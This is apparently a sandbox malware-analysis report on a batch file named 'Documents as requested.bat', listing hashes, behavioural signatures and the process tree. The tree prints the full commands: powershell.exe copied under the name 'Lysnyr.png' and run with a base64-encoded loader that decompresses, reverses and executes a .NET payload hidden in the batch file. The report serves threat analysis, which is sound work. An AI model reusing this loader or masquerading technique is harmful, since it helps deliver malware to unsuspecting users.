Analysis
-
max time kernel
122s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20231201-en -
resource tags
arch:x64arch:x86image:win7-20231201-enlocale:en-usos:windows7-x64system -
submitted
05-12-2023 17:30
Static task
static1
Behavioral task
behavioral1
Sample
Documents as requested.bat
Resource
win7-20231201-en
Behavioral task
behavioral2
Sample
Documents as requested.bat
Resource
win10v2004-20231127-en
General
-
Target
Documents as requested.bat
-
Size
1006KB
-
MD5
171e778657c7295e85e8300f360cb8f3
-
SHA1
514c680ac7eff0d76b0c3ab4a8843aaded52864b
-
SHA256
79261cedc12a63f6a3ee3bb58e45823a27b8a874975a095f6a875836a6bdda45
-
SHA512
de2537391585cc7f0124460a81f78bd771f60608228fe19bb564cf44a649693f752465fe82e9cd7edd255361f2b968766da919357088a5624149f12bc7caaf04
-
SSDEEP
24576:kxzN/hRdkbOXdtw3hQxSKXRMUMerPAY0OiXkXdsLg:klLwRkzyTe0SMg
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
Processes:
Lysnyr.pngpid process 2744 Lysnyr.png -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
Lysnyr.pngpid process 2744 Lysnyr.png -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
Lysnyr.pngpid process 2744 Lysnyr.png -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
Lysnyr.pngdescription pid process Token: SeDebugPrivilege 2744 Lysnyr.png -
Suspicious use of WriteProcessMemory 25 IoCs
Processes:
cmd.execmd.exedescription pid process target process PID 2216 wrote to memory of 2956 2216 cmd.exe cmd.exe PID 2216 wrote to memory of 2956 2216 cmd.exe cmd.exe PID 2216 wrote to memory of 2956 2216 cmd.exe cmd.exe PID 2216 wrote to memory of 1964 2216 cmd.exe xcopy.exe PID 2216 wrote to memory of 1964 2216 cmd.exe xcopy.exe PID 2216 wrote to memory of 1964 2216 cmd.exe xcopy.exe PID 2216 wrote to memory of 3004 2216 cmd.exe cmd.exe PID 2216 wrote to memory of 3004 2216 cmd.exe cmd.exe PID 2216 wrote to memory of 3004 2216 cmd.exe cmd.exe PID 3004 wrote to memory of 3060 3004 cmd.exe cmd.exe PID 3004 wrote to memory of 3060 3004 cmd.exe cmd.exe PID 3004 wrote to memory of 3060 3004 cmd.exe cmd.exe PID 3004 wrote to memory of 2632 3004 cmd.exe xcopy.exe PID 3004 wrote to memory of 2632 3004 cmd.exe xcopy.exe PID 3004 wrote to memory of 2632 3004 cmd.exe xcopy.exe PID 3004 wrote to memory of 2668 3004 cmd.exe cmd.exe PID 3004 wrote to memory of 2668 3004 cmd.exe cmd.exe PID 3004 wrote to memory of 2668 3004 cmd.exe cmd.exe PID 3004 wrote to memory of 1576 3004 cmd.exe xcopy.exe PID 3004 wrote to memory of 1576 3004 cmd.exe xcopy.exe PID 3004 wrote to memory of 1576 3004 cmd.exe xcopy.exe PID 3004 wrote to memory of 2744 3004 cmd.exe Lysnyr.png PID 3004 wrote to memory of 2744 3004 cmd.exe Lysnyr.png PID 3004 wrote to memory of 2744 3004 cmd.exe Lysnyr.png PID 3004 wrote to memory of 2744 3004 cmd.exe Lysnyr.png
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\Documents as requested.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2216 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo F "2⤵PID:2956
-
C:\Windows\system32\xcopy.exexcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\Lysnyr.png2⤵PID:1964
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\Documents as requested.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:3004 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo F "3⤵PID:3060
-
C:\Windows\system32\xcopy.exexcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\Lysnyr.png3⤵PID:2632
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo F "3⤵PID:2668
-
C:\Windows\system32\xcopy.exexcopy /d /q /y /h /i "C:\Users\Admin\AppData\Local\Temp\Documents as requested.bat" C:\Users\Admin\AppData\Local\Temp\Lysnyr.png.bat3⤵PID:1576
-
C:\Users\Admin\AppData\Local\Temp\Lysnyr.pngC:\Users\Admin\AppData\Local\Temp\Lysnyr.png -win 1 -enc JABTAGcAZwBrAHAAZABxAGIAIAA9ACAAWwBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQATABpAG4AZQBzACgAKAAoAFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAUAByAG8AYwBlAHMAcwAoACkALgBNAGEAaQBuAE0AbwBkAHUAbABlAC4ARgBpAGwAZQBOAGEAbQBlACkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACIALgBiAGEAdAAiACkALAAgAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4ACkAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0AbABhAHMAdAAgADEAOwAgACQASgBoAHMAdAB5AGEAbgByAHUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAUwBnAGcAawBwAGQAcQBiACkAOwAkAE8AcwBuAGgAcQBqAHgAbgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAoACAALAAgACQASgBoAHMAdAB5AGEAbgByAHUAIAApADsAJABvAHUAdABwAHUAdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQA7ACQAWQByAHQAZwBhAHYAeQB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAE8AcwBuAGgAcQBqAHgAbgAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQAWQByAHQAZwBhAHYAeQB0AC4AQwBvAHAAeQBUAG8AKAAgACQAbwB1AHQAcAB1AHQAIAApADsAJABZAHIAdABnAGEAdgB5AHQALgBDAGwAbwBzAGUAKAApADsAJABPAHMAbgBoAHEAagB4AG4ALgBDAGwAbwBzAGUAKAApADsAWwBiAHkAdABlAFsAXQBdACAAJABKAGgAcwB0AHkAYQBuAHIAdQAgAD0AIAAkAG8AdQB0AHAAdQB0AC4AVABvAEEAcgByAGEAeQAoACkAOwBbAEEAcgByAGEAeQBdADoAOgBSAGUAdgBlAHIAcwBlACgAJABKAGgAcwB0AHkAYQBuAHIAdQApADsAIAAkAFoAcwBmAGwAaQBpAHgAZwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAJABKAGgAcwB0AHkAYQBuAHIAdQApADsAIAAkAFcAeABpAGYAbgB1ACAAPQAgACQAWgBzAGYAbABpAGkAeABnAC4ARwBlAHQARQB4AHAAbwByAHQAZQBkAFQAeQBwAGUAcwAoACkAWwAwAF0AOwAgACQAWgBlAGUAaABuAG4AbABmAHYAegBoACAAPQAgACQAVwB4AGkAZgBuAHUALgBHAGUAdABNAGUAdABoAG8AZABzACgAKQBbADAAXQAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAIAAkAG4AdQBsAGwAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwA3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2744
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
442KB
MD592f44e405db16ac55d97e3bfe3b132fa
SHA104c5d2b4da9a0f3fa8a45702d4256cee42d8c48d
SHA2566c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7
SHA512f7d85cfb42a4d859d10f1f06f663252be50b329fcf78a05bb75a263b55235bbf8adb89d732935b1325aaea848d0311ab283ffe72b19db93e6c28a859204fdf9f
-
Filesize
442KB
MD592f44e405db16ac55d97e3bfe3b132fa
SHA104c5d2b4da9a0f3fa8a45702d4256cee42d8c48d
SHA2566c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7
SHA512f7d85cfb42a4d859d10f1f06f663252be50b329fcf78a05bb75a263b55235bbf8adb89d732935b1325aaea848d0311ab283ffe72b19db93e6c28a859204fdf9f